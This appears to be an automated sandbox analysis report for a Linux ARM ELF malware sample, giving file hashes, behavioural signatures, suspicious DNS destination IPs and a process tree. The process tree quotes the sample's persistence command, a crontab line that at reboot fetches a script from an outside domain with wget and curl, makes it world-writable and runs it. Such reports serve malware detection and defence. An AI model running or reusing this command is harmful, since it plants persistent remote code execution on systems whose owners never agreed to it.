Analysis
-
max time kernel
144s -
max time network
136s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27-10-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
Resource
debian9-armhf-20240611-en
General
-
Target
bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
-
Size
75KB
-
MD5
87f114f7f6a5830d45ffe101ccd0de1c
-
SHA1
1156d361e2050a882e4b224410682e116575588d
-
SHA256
bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
-
SHA512
1cbf6c2276bd0431b4237f7543ae3ba3eb415df5a2de45558ff5a87d5af95752f2e5406661a210cb2d294de2a8322029d6631af851ea65b2b074fa7a91a95b3b
-
SSDEEP
1536:WukDLaSfqMHzfdFM9IMksqL7dX4DgydyDXvW:WukSSfzHrrM9IPjID0W
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elfpid process 644 bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 81.169.136.222 Destination IP 178.254.22.166 Destination IP 51.158.108.203 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.ObcLt0 crontab -
Changes its process name 1 IoCs
Processes:
bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elfdescription ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS 644 bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf -
Processes:
crontabcrontabbfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elfdescription ioc process File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/mounts bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
Processes
-
/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf1⤵
- Renames itself
- Changes its process name
- Reads runtime system information
PID:644 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:645 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:648 -
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:649
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
306B
MD5156ee72da2df4c852058bb0a4d6a1c57
SHA1ddcde4860a652c8988f3cf45cb742ae199a5c4fa
SHA25622d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6
SHA51294c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64